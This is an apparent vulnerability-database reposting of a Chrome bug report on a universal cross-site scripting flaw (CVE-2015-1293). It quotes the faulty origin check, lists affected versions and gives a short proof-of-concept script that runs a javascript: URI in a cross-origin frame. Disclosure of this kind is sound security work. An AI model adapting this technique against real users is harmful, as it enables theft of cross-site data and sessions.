Chrome Universal XSS by loading a javascript: URI from an unloaded window (CVE-2015-1293)

2017-04-24T00:00:00
ID SSV:93033
Type seebug
Reporter Root
Modified 2017-04-24T00:00:00

Description

VULNERABILITY DETAILS

From /WebKit/Source/core/frame/DOMWindow.cpp:

``` bool DOMWindow::isInsecureScriptAccess(LocalDOMWindow& callingWindow, const String& urlString) { if (!protocolIsJavaScript(urlString)) return false;

// If this DOMWindow isn't currently active in the Frame, then there's no
// way we should allow the access.
if (isCurrentlyDisplayedInFrame()) {
    // FIXME: Is there some way to eliminate the need for a separate "callingWindow == this" check?
    if (&callingWindow == this)
        return false;

    // FIXME: The name canAccess seems to be a roundabout way to ask "can execute script".
    // Can we name the SecurityOrigin function better to make this more clear?
    if (callingWindow.frame()->securityContext()->securityOrigin()->canAccessCheckSuborigins(frame()->securityContext()->securityOrigin()))
        return false;
}

callingWindow.printErrorMessage(crossDomainAccessErrorMessage(&callingWindow));
return true;

}

```

|callingWindow| may be an unloaded window whose associated |frame()| holds another, potentially cross-origin document. As a result, the security check can be bypassed.

VERSION

Chrome 44.0.2403.157 (Stable) Chrome 45.0.2454.46 (Beta) Chrome 46.0.2486.0 (Dev) Chromium 47.0.2493.0 (Release build compiled today)

REPRODUCTION CASE

<script> var i = document.documentElement.appendChild(document.createElement('iframe')); var f = frames[0].Function; i.onload = function() { f("location.replace('javascript:alert(location)')")(); } i.src = 'https://abc.xyz'; </script>

                                        
                                            
                                                <script>
var i = document.documentElement.appendChild(document.createElement('iframe'));
var f = frames[0].Function;
i.onload = function() {
  f("location.replace('javascript:alert(location)')")();
}
i.src = 'https://abc.xyz';
</script>